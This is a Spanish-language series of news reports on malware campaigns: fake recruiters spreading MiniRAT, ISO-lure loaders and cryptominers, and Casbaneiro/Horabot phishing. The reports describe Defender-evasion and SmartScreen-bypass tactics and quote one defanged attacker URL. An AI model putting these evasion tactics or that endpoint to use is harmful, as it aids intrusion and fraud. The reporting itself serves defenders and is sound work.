También se ha observado que JINX-0164 apunta a desarrolladores de software haciéndose pasar por reclutadores, mientras emplea la misma técnica de ingeniería social: aprovechar la oportunidad de trabajo para programar una reunión que muestra un error técnico falso e indica a la víctima que descargue una «solución» que conduce a la instalación de malware.

Ciberseguridad

Otro componente clave del arsenal del actor de amenazas es MiniRAT, una puerta trasera basada en Go que anteriormente se distribuía a través de una versión comprometida de un paquete npm llamado @velora-dex/sdkun conjunto de herramientas DeFi legítimo que se utiliza para intercambios de tokens, órdenes limitadas y operaciones delta en la plataforma de intercambio descentralizado VeloraDEX.

Por detalles compartida por SafeDep y StepSecurity el mes pasado, la versión envenenada descargó un script de shell desde un servidor remoto, que luego entregó un binario específico de macOS llamado minirata. El malware está equipado para cargar archivos, ejecutar comandos de shell arbitrarios y recuperar cargas útiles o herramientas adicionales de dominios controlados por atacantes.

Vale la pena señalar que algunos aspectos de la campaña, junto con el uso de servicios VPN como Astrill VPN y el enfoque en criptomonedas y desarrolladores, recuerdan a los utilizados por múltiples grupos de amenazas norcoreanos como BlueNoroff, Contagious Interview y UNC1069. Sin embargo, Wiz dijo que no hay superposiciones de infraestructura que conecten JINX-0164 con Pyongyang en este momento.

«Del mismo modo, los tipos de dominios de suplantación de identidad son similares a los utilizados por otros actores norcoreanos; sin embargo, la infraestructura JINX-0164 no se superpone con otros grupos norcoreanos rastreados públicamente», dijo Wiz.

Investigadores descubren una operación minera que utiliza señuelos ISO para difundir RAT y criptomineros – CYBERDEFENSA.MX

Una operación con motivación financiera cuyo nombre en código REF1695 Se ha observado que desde noviembre de 2023 se aprovechan instaladores falsos para implementar troyanos de acceso remoto (RAT) y mineros de criptomonedas.

«Más allá de la criptominería, el actor de amenazas monetiza las infecciones a través del fraude CPA (costo por acción), dirigiendo a las víctimas a páginas de contenido bajo la apariencia de registro de software», afirman los investigadores de Elastic Security Labs, Jia Yu Chan, Cyril François y Remco Sprooten. dicho en un análisis publicado esta semana.

También se ha descubierto que iteraciones recientes de la campaña entregan un implante .NET previamente no documentado con nombre en código CNB Bot. Estos ataques aprovechan un archivo ISO como vector de infección para entregar un cargador protegido por .NET Reactor y un archivo de texto con instrucciones explícitas para que el usuario evite las protecciones de Microsoft Defender SmartScreen contra la ejecución de aplicaciones no reconocidas haciendo clic en «Más información» y «Ejecutar de todos modos».

Ciberseguridad

El cargador está diseñado para invocar PowerShell, que es responsable de configurar amplias exclusiones de Microsoft Defender Antivirus para pasar desapercibido e iniciar CNB Bot en segundo plano. Al mismo tiempo, al usuario se le muestra un mensaje de error: «No se puede iniciar la aplicación. Es posible que su sistema no cumpla con las especificaciones requeridas. Comuníquese con el soporte».

CNB Bot funciona como un cargador con capacidades para descargar y ejecutar cargas útiles adicionales, actualizarse, desinstalar y realizar acciones de limpieza para cubrir las pistas. Se comunica con un servidor de comando y control (C2) mediante solicitudes HTTP POST.

Otras campañas montadas por el actor de amenazas han aprovechado señuelos ISO similares para implementar PureRAT, PureMiner y un cargador XMRig personalizado basado en .NET, el último de los cuales llega a una URL codificada para extraer la configuración de minería y lanzar la carga útil del minero.

Como se observó recientemente en la campaña FAUX#ELEVATE, se abusa de «WinRing0x64.sys», un controlador de kernel de Windows legítimo, firmado y vulnerable, para obtener acceso al hardware a nivel de kernel y modificar la configuración de la CPU para aumentar las tasas de hash, permitiendo así mejorar el rendimiento. El uso del conductor ha sido observado en muchos campañas de criptojacking a lo largo de los años. La funcionalidad era agregado a los mineros XMRig en diciembre de 2019.

Ciberseguridad

Elastic dijo que también identificó otra campaña que conduce al despliegue de SilentCryptoMiner. El minero, además de utilizar llamadas directas al sistema para evadir la detección, toma medidas para desactivar los modos de suspensión e hibernación de Windows, configura la persistencia mediante una tarea programada y utiliza el controlador «Winring0.sys» para ajustar la CPU para las operaciones de minería.

Otro componente notable del ataque es un proceso de vigilancia que garantiza que los artefactos maliciosos y los mecanismos de persistencia se restablezcan en caso de que se eliminen. Se estima que la campaña acumuló 27,88 XMR (9.392 dólares) en cuatro carteras rastreadas, lo que indica que la operación está generando beneficios financieros constantes para el atacante.

«Más allá de la infraestructura C2, el actor de amenazas abusa de GitHub como una CDN de entrega de carga útil, alojando binarios preparados en dos cuentas identificadas», dijo Elastic. «Esta técnica desplaza el paso de descarga y ejecución de la infraestructura controlada por el operador a una plataforma confiable, lo que reduce la fricción en la detección».

El phishing de Casbaneiro se dirige a América Latina y Europa utilizando señuelos PDF dinámicos – CYBERDEFENSA.MX

Una campaña de phishing de múltiples frentes está dirigida a usuarios de habla hispana en organizaciones de América Latina y Europa para entregar troyanos bancarios de Windows como Casbaneiro (también conocido como Metamorfo) a través de otro malware llamado Horabot.

La actividad se ha atribuido a un actor brasileño de amenazas de delitos cibernéticos rastreado como Augmented Marauder y Water Saci. Trend Micro documentó por primera vez al grupo de delitos electrónicos en octubre de 2025.

«Este grupo de amenazas emplea un modelo de ataque de mayor alcance centrado en un mecanismo de entrega y propagación personalizado que incluye WhatsApp, técnicas ClickFix y phishing centrado en el correo electrónico», dijeron los investigadores de seguridad de BlueVoyant, Thomas Elkins y Joshua Green. dicho en un desglose técnico publicado el martes.

Ciberseguridad

«Ahora es evidente que, si bien estos operadores con sede en Brasil aprovechan en gran medida la automatización de WhatsApp basada en scripts para comprometer a los usuarios minoristas y consumidores en América Latina, al mismo tiempo mantienen e implementan un motor avanzado de secuestro de correo electrónico para penetrar los perímetros empresariales allí y también en Europa».

El punto de partida de la campaña es un correo electrónico de phishing que emplea mensajes con temas de citaciones judiciales para engañar a los destinatarios para que abran un archivo PDF adjunto protegido con contraseña. Al hacer clic en un enlace incrustado en el documento, la víctima dirige a un enlace malicioso e inicia una descarga automática de un archivo ZIP, lo que, a su vez, conduce a la ejecución de la aplicación HTML provisional (HTA) y cargas útiles VBS.

El script VBS está diseñado para llevar a cabo comprobaciones ambientales y antianálisis similares a las que se encuentran en los artefactos de Horabot, incluidas comprobaciones del software antivirus Avast, y procede a recuperar las cargas útiles de la siguiente etapa desde un servidor remoto. Entre los archivos descargados se encuentran cargadores basados ​​en AutoIt, cada uno de los cuales extrae y ejecuta archivos de carga útil cifrados con extensiones «.ia» o «.at» para eventualmente lanzar dos familias de malware: Casbaneiro («staticdata.dll») y Horabot («at.dll»).

Si bien Casbaneiro es la carga útil principal, Horabot se utiliza como mecanismo de propagación del malware. El módulo Delphi DLL de Casbaneiro se pone en contacto con un servidor de comando y control (C2) para obtener un script de PowerShell que emplea Horabot para distribuir el malware a través de correos electrónicos de phishing a contactos recopilados de Microsoft Outlook.

«En lugar de distribuir un archivo estático o un enlace codificado como se ve en campañas anteriores de Horabot, este script inicia una solicitud HTTP POST a una API PHP remota (hxxps://tt.grupobedfs[.]com/…/gera_pdf.php), pasando un PIN de cuatro dígitos generado aleatoriamente», dijo BlueVoyant.

«El servidor falsifica dinámicamente un PDF personalizado, protegido con contraseña, que se hace pasar por una citación judicial española, que se devuelve al host infectado. Luego, el script recorre la lista de correo electrónico filtrada, utilizando la propia cuenta de correo electrónico del usuario comprometido para enviar un correo electrónico de phishing personalizado con el PDF recién generado adjunto».

También se utiliza en conjunto una DLL secundaria relacionada con Horabot («at.dll») que funciona como una herramienta de spam y secuestro de cuentas dirigida a cuentas de Yahoo, Live y Gmail para enviar correos electrónicos de phishing a través de Outlook. Horabot es Se estima que se utilizará en ataques dirigidos a América Latina desde al menos noviembre de 2020.

Ciberseguridad

Water Saci tiene un historial de uso de WhatsApp Web como vector de distribución para difundir troyanos bancarios como Maverick y Casbaneiro en forma de gusano. Sin embargo, las campañas recientes destacadas por Kaspersky han apalancado la táctica de ingeniería social de ClickFix para engañar a los usuarios para que ejecuten archivos HTA maliciosos con el objetivo final de implementar Casbaneiro y el esparcidor Horabot.

«En conjunto, la integración de la ingeniería social de ClickFix, junto con la generación dinámica de PDF y la automatización de WhatsApp, demuestra un adversario ágil que continuamente innova y ejecuta diversas rutas de ataque para eludir los controles de seguridad modernos», concluyeron los investigadores.

«Este adversario mantiene una infraestructura de ataque bifurcada y de múltiples frentes, implementando dinámicamente la cadena Maverick centrada en WhatsApp y utilizando simultáneamente rutas de ataque ClickFix y Horabot basadas en correo electrónico».